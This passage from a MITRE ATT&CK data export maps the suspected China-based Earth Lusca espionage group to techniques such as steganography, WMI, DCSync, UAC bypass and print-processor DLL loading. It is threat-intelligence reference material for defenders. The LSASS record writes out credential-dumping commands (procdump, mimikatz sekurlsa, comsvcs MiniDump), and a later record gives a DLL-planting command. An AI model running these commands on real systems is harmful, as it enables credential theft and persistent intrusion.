Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used compromised web servers as part of their operational infrastructure.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--ff6f4b5b-1b5f-4f8f-9307-345a3c278151 revoked : False technique : Server technique_description : Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1584.004 matrix : mitre-attack platform : ['PRE'] data_sources : ['Internet Scan: Response Content', 'Internet Scan: Response Metadata'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 
'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired multiple servers for some of their operations, using each server for a different role.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--dd033098-eb56-4c17-90d7-c7673f04bcd6 revoked : False technique : Server technique_description : Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. 
Adversaries may use web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1583.004 matrix : mitre-attack platform : ['PRE'] data_sources : ['Internet Scan: Response Metadata', 'Internet Scan: Response Content'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used steganography to hide shellcode in a BMP image file.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--09f5abff-ad09-4d5b-a6c4-612d4171c089 revoked : False technique : Steganography technique_description : Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files. [Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) By the end of 2017, a threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. 
In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1027.003 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows'] data_sources : ['File: File Metadata'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316 revoked : False technique : Malicious Link technique_description : An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002). 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')] technique_id : T1204.001 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows'] data_sources : ['File: File Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation'] permissions_required : ['User'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used a VBA script to execute WMI.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--85216e27-5d58-4d89-8b04-3ef50ed14f95 revoked : False technique : Windows Management Instrumentation technique_description : Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. 
(Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')] technique_id : T1047 matrix : mitre-attack platform : ['Windows'] data_sources : ['Network Traffic: Network Connection Creation', 'Process: Process Creation', 'WMI: WMI Creation', 'Command: Command Execution'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster; however, security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used Python scripts for port scanning or building reverse shells.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6e6f9a76-23b6-4474-abc1-3d477284c220
revoked : False
technique : Python
technique_description : Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.006
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
permissions_required : ['Administrator', 'SYSTEM', 'root']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used WinRAR to compress stolen files into an archive prior to exfiltration.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--d0a3d891-2555-45eb-8aaf-99b86372607b
revoked : False
technique : Archive via Utility
technique_description : Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third-party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. Adversaries may also use third-party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
technique_id : T1560.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--9d82c2c5-7d98-40dd-9171-1d605f259064
revoked : False
technique : LSASS Memory
technique_description : Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump:
* procdump -ma lsass.exe lsass_dump
Locally, mimikatz can be run using:
* sekurlsa::Minidump lsassdump.dmp
* sekurlsa::logonPasswords
Built-in Windows tools such as comsvcs.dll can also be used:
* rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into the LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1003.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Access', 'Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Process: OS API Execution', 'Logon Session: Logon Session Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used a DCSync command with [Mimikatz](https://attack.mitre.org/software/S0002) to retrieve credentials from an exploited controller.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--14c209b9-cef8-4acf-8deb-57c03beaa64f
revoked : False
technique : DCSync
technique_description : Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync. Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1003.006
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Active Directory: Active Directory Object Access', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
permissions_required : ['Administrator']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used the Fodhelper UAC bypass technique to gain elevated privileges.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a57c1d9d-0d2f-4206-a53f-d31ab7c53c17
revoked : False
technique : Bypass User Account Control
technique_description : Adversaries may bypass UAC mechanisms to elevate process privileges on a system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1548.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Command: Command Execution', 'Process: Process Creation', 'Process: Process Metadata']
permissions_required : ['Administrator', 'User']
effective_permissions : ['Administrator']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command `move [file path] c:\windows\system32\spool\prtprocs\x64\spool.dll` to move a malicious DLL into place and register it as a Windows print processor, which was eventually loaded by the Print Spooler service.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--4feaa82b-a356-4412-be2b-daa6ea6df82c
revoked : False
technique : Match Legitimate Name or Location
technique_description : Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. Adversaries may also use the same icon of the file they are trying to mimic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1036.005
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Containers']
data_sources : ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Metadata', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command powershell “Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list - property * | findstr “Address”” to find the network information of successfully logged-in accounts and discover the addresses of other machines. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used multiple scanning tools to discover other machines within the same compromised network.(Citation: TrendMicro EarthLusca 2022)
